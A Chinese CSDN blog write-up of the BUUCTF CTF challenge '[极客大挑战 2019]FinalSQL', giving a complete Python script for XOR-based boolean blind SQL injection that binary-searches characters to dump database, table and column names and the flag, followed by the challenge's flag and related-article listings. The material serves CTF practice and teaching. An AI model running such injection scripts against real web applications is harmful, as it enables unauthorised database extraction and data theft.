web buuctf [极客大挑战 2019]FinalSQL

最新推荐文章于 2023-10-31 19:41:10 发布
最新推荐文章于 2023-10-31 19:41:10 发布
阅读量1.1k 收藏 2
点赞数
文章标签: 盲注
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44214568/article/details/124047431
版权

知识点:盲注

1.开题

最上面提示用的语言php,脚本python,数据库mysql,注入形式sql盲注

2.随便点个12345,用bp抓包,进行fuzz

 

 报错盲注,贴脚本

# -*- coding: utf-8 -*-
# @Author: jiaoben
# @Date  :  2020/05/03

import re
import requests
import string

url = "http://dcf33d60-7ffa-41c0-8915-e935ccbdd37b.node3.buuoj.cn//search.php"
flag = ''


def payload(i, j):
    # 数据库名字
    sql = "1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1"%(i,j)
    # 表名
    # sql = "1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))>%d)^1"%(i,j)
    # 列名
    # sql = "1^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))>%d)^1"%(i,j)
    # 查询flag
    # sql = "1^(ord(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)^1" % (i, j)
    data = {"id": sql}
    r = requests.get(url, params=data)
    # print (r.url)
    if "Click" in r.text:
       res = 1
    else:
       res = 0
    return res


def exp():
    global flag
    for i in range(1, 10000):
        print(i, ':')
        low = 31
        high = 127
        while low <= high:
              mid = (low + high) // 2
              res = payload(i, mid)
              if res:
                 low = mid + 1
              else:
                 high = mid - 1
        f = int((low + high + 1)) // 2
        if (f == 127 or f == 31):
           break
        # print (f)
        flag += chr(f)
        print(flag)


exp()
print('flag=', flag)

大佬的wp,自己改一下url。

 得到,flag{0273bf0d-1bc6-4bb4-b395-0fc380730ec2}

半杯雨水敬过客
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUFFCTF文件中的秘密1
WINDY_PACE的博客
12-03 472
BUFFCTF文件中的秘密1
BUUCTF [极客挑战 2019]FinalSQL
qq_60829702的博客
10-21 1277
因为之前的几道盲注题目我都是直接看师傅的wp拿来用的,现在自己写一下发现果然光看不如去写。只有自己真正的去写了脚本才会发现一些东西永远都是看起来简单的一批,但是真正的让自己独立写出来还是有点难度的。毕竟那是别人的东西不是自己的东西,我们要把其他师傅的知识变成我们自己的。本人菜鸟一枚,虽然花了挺多时间写这个题目和wp的,但是收获到了很多东西,也希望我能坚持下来。
BUUCTF 小明的保险箱 1
最新发布
YueXuan_521的博客
10-31 511
BUUCTF 小明的保险箱 1
BUUCTF NewStarCTF 公开赛赛道Week4 Writeup
末初的CSDN博客
10-16 3413
BUUCTF NewStarCTF 公开赛赛道Week4 Writeup
BUUCTF-[极客挑战 2019]FinalSQL
weixin_44016181的博客
09-15 322
除了普通的注入流程,报错注入,时间注入外,这题涉及了布尔注入当中的异或注入,根据回显的状态信息来获取数据库的相关信息。这样即便是我们不能直接调用和查看数据库,也能通过这种特别的注入方式得到flag。
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
极客web前端
07-22
教程名称:极客web前端教程目录:【】1、走进前端工程师的世界【】2、HTML5【】3、CSS3【】4、Javascript【】5、常?的库之 jQuery【】6、常?的库之 jQuery UI【】7、常?的库之 jQuery Mobile【】8、常用的库之...
Web3极客日报 #12
01-08
基于Web3,Solidity,Truffle的一个完整的售卖和购买的简单Dapp demo。 如何在以太坊上构建TodoList – 教程@Riverhttps://www.dappuniversity.com/articles/blockchain-app-tutorial 基于Web3,Solidity,Truffle等...
Web3极客日报 #6
01-08
如何理解Rust中的可变与不可变? ...@洋芋:本文介绍了Rust标准库中的Cell, RefCell,其作为提供内部可变性的容器,弥补了Rust所有权机制在灵活性上和某些场景下的不足。 学习Polkadot的好地方:Polkadot Wiki ...
Web3极客日报 #10
01-08
https://learnblockchain.cn/2019/07/27/zengo-tss/ @Shooter:使用ZenGo 钱包不需要备份助记词,交易也不需要输入密码,强调 Keyless 概念,只需要 touchID 或 faceID 授权就可以进行交易。 通过BigQuery服务分析...
buuctf 刷题5(sql注入篇)
weixin_63231007的博客
05-10 3942
sql注入挺难的我感觉,但是很重要,有好多绕过,和注入手段需要一步步在尝试,因此本章刷一下buuctf各个sql注入题目,来巩固联系一下自己在sql注入方面的知识。 [极客挑战 2019]HardSQL 1 输入1',出错,1'#显示不同,存在单引号闭合注入。 order by查字段,union,堆叠注入,和输入数字都烦返回错误 =,空格,和好多关键字都被过滤了。 空格用()绕过,=用like绕过。 尝试报错注入: 1'or(updatexml(1,concat...
buuctf 极客挑战 finalsql
SopRomeo的博客
02-05 1494
说来话长,这边记录下,页面不一样了,之前的注入全部行不通,考虑到最烦最难得盲注,利用二分法查找是非常快的 这边记下playload 查库名:id=1^(ascii(substr((select(database())),1,1))>1)^1 库名为geek 查表名:id=1^(ascii(substr((select(group_concat(table_name))from(inform...
[极客挑战 2019]FinalSQL wp
{OvEr}的博客
11-19 408
[极客挑战 2019]FinalSQL wp 终极sql注入了,考点是盲注(写脚本的那种இ௰இ) 打开网页是这样的。 那个红色的卡片,我们随便点进去看看,直接点最后一个吧。 通过url判断注入点是id。 接着做FUZZ测试,发现同样过滤了union、or、and、||、&等我们常用的关键字,但是没有过滤异或符号^。 当我们输入id=1^1时,回显"Error" 当我们输入id=1^0时,回显正常 接下来我们进行盲注,下面是大神的脚本 step 1爆数据库 import requests u
[极客挑战 2019]FinalSQL(bypass盲注
qq_56313338的博客
09-06 723
这里是数字型注入,使用异或进行爆破
盲注脚本爆数据库之[极客挑战 2019]FinalSQL
qq_58970968的博客
08-11 437
当过滤的东西很多很多的时候,可以考虑盲注,用 ^ 来判断是否可以进行脚本注入;使用二分法查找数据库的每一个字母;到时候只需要改回显的关键字和url就行。
[极客挑战 2019]FinalSQL
qq_52907838的博客
07-27 1570
打开环境,看题目就知道是个SQL题,有个登录框,上面还有5个选项: 依次点击一下: 这是我们注意到上面的参数值在随之变化: 他说在下一个,我们就改成id=6看看: 说明注入点应该是在id这个位置,我们输入:id=6' 显示:Error! 说明存在SQL注入,接着:id=6'or 1=1# 显示:你可别被我逮住了,臭弟弟,说明存在过滤,那过滤了哪些呢?我们来试一下,发现过滤了空格,等号,or,and,union,select这些都过滤得差不多了,...
[极客挑战 2019]FinalSQL 1
shinygod的博客
04-01 1008
知识点:异或盲注 分析 这边的两个框,试了半天啥东西都没有。 看了大佬的wp,在这注入,而且还时异或盲注。 异或盲注原理 1^1返回0 1^0返回1 所以我们可以通过判断返回的字符来异或盲注。 payload 判断数据库长度,如果(length(database())={0})等于1,说明数据库长度已经出来,则1^1为0,页面回显ERROR #数据库长度 import requests; for i in range(1,20): url = "http://058f339f-0127
buuctf 极客挑战2019php
08-24
- *2* *3* [【BUUCTF-Web】 [极客挑战 2019]PHP](https://blog.csdn.net/m0_51683653/article/details/126693573)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值